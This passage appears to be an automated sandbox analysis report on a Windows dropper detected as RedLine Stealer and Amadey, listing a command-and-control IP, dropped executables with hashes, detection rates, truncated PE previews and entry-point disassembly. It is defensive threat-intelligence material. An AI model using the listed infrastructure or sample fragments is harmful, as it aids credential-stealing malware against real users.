                                                                                                                                                      21:18:31API Interceptor9x Sleep call for process: caQi43qE17.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      193.233.20.24uCd7d27ds6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        t2UyxKXtaO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                          9w1Fu81ONv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                            0j9E3lKTwq.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                              exP35zYwdx.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                c5BzxFAhYv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                  Kn783XlJH2.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                    YoMPnI12pO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      9NEtsWMHrU.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                        Z4ljN27ANN.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                          MfvWhbfZpK.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                            B6sZPv5mnE.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                              0NrbwBYXhq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                Dx8NezHn1D.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                    D9kANbd9Ui.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                      a2H0BckZji.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                        NicHOn9d7A.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                          7mdq5Msk2Q.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            CXB4nbHURO.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              REDCOM-ASRedcomKhabarovskRussiaRUuCd7d27ds6.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              t2UyxKXtaO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              9w1Fu81ONv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              0j9E3lKTwq.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              exP35zYwdx.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              c5BzxFAhYv.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              Kn783XlJH2.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              YoMPnI12pO.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              9NEtsWMHrU.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              Z4ljN27ANN.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              MfvWhbfZpK.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              B6sZPv5mnE.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              0NrbwBYXhq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              Dx8NezHn1D.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              D9kANbd9Ui.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              a2H0BckZji.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              NicHOn9d7A.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              7mdq5Msk2Q.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              CXB4nbHURO.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.24
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exea2H0BckZji.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                keUAZCkfIk.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                  Entropy (8bit):5.354940450065058
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                  MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2843
                                                                                                                                                                                                  Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1Hl:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtx
                                                                                                                                                                                                  MD5:E9C2F4CC11CEA097B88D7D224F41A5B3
                                                                                                                                                                                                  SHA1:B16891C1E967E2803C1F994CA61ED82A52233C54
                                                                                                                                                                                                  SHA-256:843CF5780CF7C018F8431C1A69DB910BDC039E48C495A2C854A0C1A9C52CAF82
                                                                                                                                                                                                  SHA-512:2259C7E86AE80AC4CB26AB22FE50295D2C17E45BF31DF0BC3E91BCC9063300616764C1219E9B40A16EED0D2D63035B0EF1ED7B1BDBAEDF9408BF9D46E5A86D48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):179350
                                                                                                                                                                                                  Entropy (8bit):4.9480962176817425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:6xqZWBJaHEDgXTzzfMK8emA9Xh8fxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOG:oqZVTPfBbXh
                                                                                                                                                                                                  MD5:32E2EFAFEE3B768A9C4604727D692077
                                                                                                                                                                                                  SHA1:46CE5FD08B40BC203D6B0B9DF1B47185ABCD504F
                                                                                                                                                                                                  SHA-256:C665BE7A74C2C3F38E8EFA0998D6D52668B56287464EA247EA52AE17F91937BE
                                                                                                                                                                                                  SHA-512:08F29ABC146EEB5CC808172BB83545E5F37293E35E9A1A36B9EB5491C7B085DC715B8EE3B4CD90E723AD52138D8D7119BA5E08A43E0F873DBBF697BF4F979064
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, Author: ditekSHen
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............z.... ........@.. ....................... ............@.................................(...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):906240
                                                                                                                                                                                                  Entropy (8bit):7.91223652331673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:7Mr9y904k1gr1VZEDRkLq/uvrQWQ42Syrq+g3ZclzYwEjVGhWriFj5rgR5+k1F0x:yyT3r0BuvskTy6yMwwAYm5ERw8F4cG
                                                                                                                                                                                                  MD5:D16ACC7C93BF0ECC8BE14CAE8BE1F15A
                                                                                                                                                                                                  SHA1:9E463F325A67401D5966FC8DE612525AFF28356D
                                                                                                                                                                                                  SHA-256:BE5DB62AA39661F851800B909035991F177AA3A277026BDC3015F797EE85B0A0
                                                                                                                                                                                                  SHA-512:E01C1DD40948FA57A48A43F624A4F4CB78259728F31003C95C4D61FE27B6663EA371BC10FDF9ED447BC6C28E6DC15F5E41AACBEE03463B5A58EA90673DFAF6F1
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 47%, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...l......`j............@.......................... ............@...... .......................................M..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....P.......N...|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313856
                                                                                                                                                                                                  Entropy (8bit):7.320447473996942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:h0xQZh23G4D4EFCd7KUGU+NSjclyAFhk68XEMDtRnZeTbE6PfM:h0SZSG4cTKUtvcllh0EcHZG
                                                                                                                                                                                                  MD5:93E470CB72A45CE819FF3EDB9B4A51B3
                                                                                                                                                                                                  SHA1:8F06779116BFAA52497EC079BC6C12C4EF88B68E
                                                                                                                                                                                                  SHA-256:2C0208F12D918E001922D851B78A9C632B4E1959E1AA888BF7EFBA150ECAEE49
                                                                                                                                                                                                  SHA-512:BC9D4583EC9C29D53D59352629BE5378F4D468DB0F0062BC0EC48624BD4F3C34AD7425B14EF27C21A4D6C4FB465A32186C4CDB8982CE8293CC3FAAA1940573D4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 26%, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L....N.a............................\_.......@....@..................................V.......................................3..P....P..@...........................................................(7..@............................................text....-.......................... ..`.data...P....@.......2..............@....rsrc...@....P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):676864
                                                                                                                                                                                                  Entropy (8bit):7.865142493950552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:JMrNy90m6L3OvriWQW2fyoq+gHZclaS4EDVGhbriAj5Fg85+eqFqT:kyXvW6Gyfyr48Axd5+8wfFK
                                                                                                                                                                                                  MD5:A19D601A69B407CED85F6C6E721D0E2C
                                                                                                                                                                                                  SHA1:02C12195F32714198E27AA956EBF09DF5397D3CC
                                                                                                                                                                                                  SHA-256:33940678091A72B7F32492518A6B87F79A573B8BB3BB802621667960D7599B7D
                                                                                                                                                                                                  SHA-512:69153D4B0D783A6F3B932BE8CBADD80BD597B3308F444547BC918975356B0088051A751B2160CE2BA296DF655B43820630D21C5685F5C3D7A01755F14D5F83EE
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................]....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):253952
                                                                                                                                                                                                  Entropy (8bit):7.089913840101579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:nHOAjO/AOKJL0or0n7zSoP2fbB+XgRU2DnufOEjc7NfiWOpIn+vnJVb+:Hli/ARV0or0xCB6ghDufydSgQnr+
                                                                                                                                                                                                  MD5:16CD045519321C1F674C2C52ED92CD5A
                                                                                                                                                                                                  SHA1:41703764D7FF71A0DAD4B54F62FA8412C45B3EDE
                                                                                                                                                                                                  SHA-256:B873395D8B0B53E7C0F6192AE48A129253F4D592A58919DDE8668B9D3FA9EB33
                                                                                                                                                                                                  SHA-512:B72315FF3771EF4F4CA669D991D1FDF2928CB0B6F377D682B267583F8382870EF6987DBC780F73AC6B1FBD51593803478910187D62B5B06C3015FF8CE9C7D07E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: a2H0BckZji.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: keUAZCkfIk.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L...~.[a............................\_.......@....@.................................-........................................3..P....`..@...........................................................(7..@............................................text....-.......................... ..`.data........@.......2..............@....rsrc...@....`.......4..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):397824
                                                                                                                                                                                                  Entropy (8bit):7.705781046496275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:Kby+bnr+EaN7MqvKSyeO+ueO+zjTDzjTmmmmp2222222cBxhRBxhRBxhRBxqVp0h:pMrCy90LIFe8KUtZclauXEPV8h9riU
                                                                                                                                                                                                  MD5:C55924DDF020D2D574D1FF1BDF1446FC
                                                                                                                                                                                                  SHA1:EBF73995124960D5ACA074A3D54F61721E213315
                                                                                                                                                                                                  SHA-256:8A7C493DD26705372D5D0B4D1F10AC5012651FDB080C0D5C9D06AF74FA4BDFC1
                                                                                                                                                                                                  SHA-512:FE8320D7EE3B8AF751241FFAE0B0740E1058E80540583A241D210AD7F37ADB08FE82EDB9A1222544BDCA5E45F4ACEF91BE9A2BE22061020E3C96E2E6142ED382
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`......q.....@...... ..........................................................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11614
                                                                                                                                                                                                  Entropy (8bit):4.862051929853911
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                  MD5:23F943F98B2EEF1D8427BA90111C34E2
                                                                                                                                                                                                  SHA1:47BE76D126057E63DD8C9BE3F7EAC252A86A9B53
                                                                                                                                                                                                  SHA-256:76EE34B15E8F7D1A38BA5D8221AC5144BC624A7253195AFEE8E83D93C68DE6D5
                                                                                                                                                                                                  SHA-512:32EA29DF413FDC8F630212957A8E4FD91575A9431DA4750758B156EC013F6C5C700FECA8271AEE81FB5DC6EF12EA4578F107781149563BE2988A28A2FEB9D811
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313856
                                                                                                                                                                                                  Entropy (8bit):7.320447473996942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:h0xQZh23G4D4EFCd7KUGU+NSjclyAFhk68XEMDtRnZeTbE6PfM:h0SZSG4cTKUtvcllh0EcHZG
                                                                                                                                                                                                  MD5:93E470CB72A45CE819FF3EDB9B4A51B3
                                                                                                                                                                                                  SHA1:8F06779116BFAA52497EC079BC6C12C4EF88B68E
                                                                                                                                                                                                  SHA-256:2C0208F12D918E001922D851B78A9C632B4E1959E1AA888BF7EFBA150ECAEE49
                                                                                                                                                                                                  SHA-512:BC9D4583EC9C29D53D59352629BE5378F4D468DB0F0062BC0EC48624BD4F3C34AD7425B14EF27C21A4D6C4FB465A32186C4CDB8982CE8293CC3FAAA1940573D4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L....N.a............................\_.......@....@..................................V.......................................3..P....P..@...........................................................(7..@............................................text....-.......................... ..`.data...P....@.......2..............@....rsrc...@....P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.928880210499275
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:file.exe
                                                                                                                                                                                                  File size:1046528
                                                                                                                                                                                                  MD5:0c8e10cf6146a0f67d5e4f784c251ffe
                                                                                                                                                                                                  SHA1:ec1922422ad71e92c53acbe0db7f27161fc8a426
                                                                                                                                                                                                  SHA256:f4e5103746728e49e2aad05ffc1f61d58a9f61071a822642779d5980d001e54f
                                                                                                                                                                                                  SHA512:b068ac9aaded5afd3dbbc4d3a362573fdd8ad0bb82c6673c22ad3e92c2ceb666ea8e397c54b90e830b838964ec0d6919f9a316e4edf0f136dc4d322f1ddcc74d
                                                                                                                                                                                                  SSDEEP:24576:ryhN0hWbgTrEJK1yWy7SaAG+nIRwmFKk2AMukb:ehNsWEfEJ37eGSpmFKk2AMuk
                                                                                                                                                                                                  TLSH:AA25220BD7EC9177D47117741AFA03D3063A7C62AA78529B2B8E5D1D0CB26B1B272327
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                  Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                  Entrypoint:0x406a60
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:10
                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                  File Version Major:10
                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                  Subsystem Version Major:10
                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                  Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  call 00007F7E18BDBED5h
                                                                                                                                                                                                  jmp 00007F7E18BDB7E5h
                                                                                                                                                                                                  push 00000058h
                                                                                                                                                                                                  push 004072B8h
                                                                                                                                                                                                  call 00007F7E18BDBF77h
                                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                                  mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                  lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  call dword ptr [0040A184h]
                                                                                                                                                                                                  mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                  mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                  mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                  mov edi, ebx
                                                                                                                                                                                                  mov edx, 004088ACh
                                                                                                                                                                                                  mov ecx, esi
                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                  lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  je 00007F7E18BDB7FAh
                                                                                                                                                                                                  cmp eax, esi
                                                                                                                                                                                                  jne 00007F7E18BDB7E9h
                                                                                                                                                                                                  xor esi, esi
                                                                                                                                                                                                  inc esi
                                                                                                                                                                                                  mov edi, esi
                                                                                                                                                                                                  jmp 00007F7E18BDB7F2h
                                                                                                                                                                                                  push 000003E8h
                                                                                                                                                                                                  call dword ptr [0040A188h]
                                                                                                                                                                                                  jmp 00007F7E18BDB7B9h
                                                                                                                                                                                                  xor esi, esi
                                                                                                                                                                                                  inc esi
                                                                                                                                                                                                  cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                  jne 00007F7E18BDB7ECh
                                                                                                                                                                                                  push 0000001Fh
                                                                                                                                                                                                  call 00007F7E18BDBD0Bh
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  jmp 00007F7E18BDB81Ch
                                                                                                                                                                                                  cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                  jne 00007F7E18BDB80Eh
                                                                                                                                                                                                  mov dword ptr [004088B0h], esi
                                                                                                                                                                                                  push 004010C4h
                                                                                                                                                                                                  push 004010B8h
                                                                                                                                                                                                  call 00007F7E18BDB936h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  je 00007F7E18BDB7F9h
                                                                                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                  mov eax, 000000FFh
                                                                                                                                                                                                  jmp 00007F7E18BDB919h
                                                                                                                                                                                                  mov dword ptr [004081E4h], esi
                                                                                                                                                                                                  cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                  jne 00007F7E18BDB7FDh
                                                                                                                                                                                                  push 004010B4h
                                                                                                                                                                                                  push 004010ACh
                                                                                                                                                                                                  call 00007F7E18BDBEC5h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
